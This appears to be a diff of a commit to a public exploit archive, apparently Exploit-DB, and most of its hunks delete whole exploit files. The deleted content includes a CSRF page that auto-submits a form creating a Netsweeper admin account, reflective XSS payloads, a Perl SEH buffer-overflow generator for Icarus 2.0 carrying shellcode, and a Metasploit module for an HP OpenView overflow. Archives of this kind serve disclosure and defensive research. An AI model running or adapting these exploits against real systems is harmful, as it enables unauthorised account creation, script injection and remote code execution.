Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
|
||||
|
||||
[~] IRANIAN Young HackerZ
|
||||
|
||||
[~] GreetZ : Exploit-DB TeaM
|
||||
|
||||
[~]######################################### FinisH :D #############################################[~]
|
|
@ -1,68 +0,0 @@
|
|||
# Exploit Title: Netsweeper WebAdmin Portal CSRF, Reflective XSS, and "The later"
|
||||
# Date: Discovered and reported CSRF and XSS reported 4/2012 and "The later" reported 7/2012
|
||||
# Author: Jacob Holcomb/Gimppy042
|
||||
# Software Link: Netsweeper Inc. - Netsweeper Internet Filter (www.netsweeper.com)
|
||||
# CVE : CVE-2012-2446 for the XSS issues, CVE-2012-2447 for the CSRF, and CVE-2012-3859 for the "The later"
|
||||
|
||||
*NOTE:
|
||||
# "The later" was disclosed and reported to Netsweeper at a later date and will be posted as an addendum to this post and my posted disclosure report in the near future. "The later" vulnerability bears CVE-2012-3859.
|
||||
|
||||
|
||||
|
||||
CSRF Exploitation:
|
||||
In the following example we use CSRF to forge a HTTP POST request that will create an administrator account. The user must be logged in for CSRF to work. Exploitation of a non-administrative users (Sys op) account results in creation of a standard user account.
|
||||
|
||||
<head>
|
||||
<title>CSRF Create Admin - Netsweeper WebAdmin Portal BY:Jacob Holcomb</title>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
|
||||
<form name="pwnd" action="http://server.domain_name/webadmin/accountmgr/adminupdate.php?act=add&filter_login=&goodmsg=Account+Added" method="post">
|
||||
<input type="hidden" name="userid" value="netsweeperPWND" />
|
||||
<input type="hidden" name="firstname" value="Jacob" />
|
||||
<input type="hidden" name="lastname" value="Holcomb" />
|
||||
<input type="hidden" name="email" value="pwnd@pwnd.com" />
|
||||
<input type="hidden" name="organization" value="yep_PWND" />
|
||||
<input type="hidden" name="description" value="PWND" />
|
||||
<input type="hidden" name="pass1" value="Pwnd-321" />
|
||||
<input type="hidden" name="pass2" value="Pwnd-321" />
|
||||
<input type="hidden" name="classification" value="admin" />
|
||||
<input type="hidden" name="expire" value="" />
|
||||
<input type="hidden" name="accounttheme" value="" />
|
||||
<input type="hidden" name="accountpmtheme" value="gpmtheme" />
|
||||
|
||||
<script>
|
||||
document.pwnd.submit();
|
||||
</script>
|
||||
|
||||
</body>
|
||||
|
||||
|
||||
XSS Exploitation:
|
||||
|
||||
The following POC code exploits a reflective XSS vulnerability using the HTTP POST method.
|
||||
|
||||
<head>
|
||||
<title>Post XSS(Reflective) Netsweeper WebAdmin Portal BY:Jacob Holcomb</title>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
|
||||
<form name="pwnd" action="http:// server.domain_name
|
||||
/webadmin/tools/local_lookup.php?action=lookup" method="post">
|
||||
<input type="hidden" name="user" value="pwnd" />
|
||||
<input type="hidden" name="group" value="><script>alert('XSS')</script>" />
|
||||
<input type="hidden" name="policy" value="pwnd" />
|
||||
<input type="hidden" name="url" value="pwnd" />
|
||||
|
||||
<script>
|
||||
document.getElementById('pwnd').submit();
|
||||
</script>
|
||||
|
||||
</body>
|
||||
|
||||
|
||||
"The later" Exploitation:
|
||||
|
||||
Coming soon... : )
|
|
@ -1,4 +1,4 @@
|
|||
source: http://www.securityfocus.com/bid/16794/
|
||||
source: http://www.securityfocus.com/bid/16794/info
|
||||
|
||||
Oi! Email Marketing System is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
source: http://www.securityfocus.com/bid/27830/
|
||||
source: http://www.securityfocus.com/bid/27830/info
|
||||
|
||||
The Joomla! and Mambo 'com_scheduling' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
|
|
|
@ -1,7 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/34383/info
|
||||
|
||||
The Apache 'mod_perl' module is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
|
|
@ -1,39 +0,0 @@
|
|||
#!/user/bin/perl
|
||||
#Icarus 2.0 (.PGn File)Universal Local BOF (SEH)
|
||||
#tested on win SP2
|
||||
#Author: germaya_x & D3v!LFUCK3R
|
||||
#Download :http://www.randomsoftware.com/pub/icarus.exe
|
||||
#GreTz [2] :his0k4 , Eddy_BAck0o , THE INJECTOR , ALL : www.lezr.com members :)
|
||||
#fuck To: RoMaNcYxHaCkEr & alnjm33 & ALL www.sec-war.com members :)
|
||||
#############################################################
|
||||
my $bof="A" x 332 ;
|
||||
my $NEXT_sEh="\xEB\x06\x90\x90";
|
||||
my $SEH="\x3F\xB2\x2E\x66";#hnetcfg.DLL
|
||||
my $nop="\x90" x 20;
|
||||
my $sec=
|
||||
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
|
||||
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
|
||||
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
|
||||
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
|
||||
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
|
||||
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
|
||||
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
|
||||
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
|
||||
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
|
||||
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
|
||||
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
|
||||
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
|
||||
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
|
||||
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
|
||||
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
|
||||
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
|
||||
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
|
||||
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
|
||||
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
|
||||
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
|
||||
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
|
||||
"\x4e\x56\x43\x46\x42\x30\x5a";
|
||||
###################################################################
|
||||
open(myfile,'>> exploit.pgn');
|
||||
print myfile $bof.$NEXT_sEh.$SEH.$nop.$sec;
|
||||
###################################################################
|
|
@ -1,6 +1,5 @@
|
|||
source:
|
||||
http://www.ragestorm.net/blogs/?p=255
|
||||
http://secunia.com/advisories/40870/
|
||||
source: http://www.ragestorm.net/blogs/?p=255
|
||||
source: http://secunia.com/advisories/40870/
|
||||
|
||||
|
||||
DEVMODE dm = {0};
|
||||
|
|
|
@ -1,74 +0,0 @@
|
|||
##
|
||||
# $Id: hp_nnm_toolbar_01.rb 13192 2011-07-16 04:45:21Z sinn3r $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.
|
||||
By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute
|
||||
arbitrary code.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 13192 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2008-0067' ],
|
||||
[ 'OSVDB', '53222' ],
|
||||
[ 'BID', '33147' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 650,
|
||||
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jan 7 2009'))
|
||||
|
||||
register_options( [ Opt::RPORT(80) ], self.class )
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
sploit = rand_text_alpha_upper(5108) + [target.ret].pack('V') + payload.encoded
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
send_request_raw({
|
||||
'uri' => "/OvCgi/Toolbar.exe?" + sploit,
|
||||
'method' => "GET",
|
||||
}, 5)
|
||||
|
||||
|
||||
handler
|
||||
|
||||
end
|
||||
|
||||
end
|
|
@ -1,4 +1,4 @@
|
|||
source: http://www.securityfocus.com/bid/2167/exploit
|
||||
source: http://www.securityfocus.com/bid/2167/info
|
||||
|
||||
Windows Media Player is an application used for digital audio, and video content viewing. It can be embedded in webpages as an ActiveX control.
|
||||
|
||||
|
|
Loading…
Add table
Reference in a new issue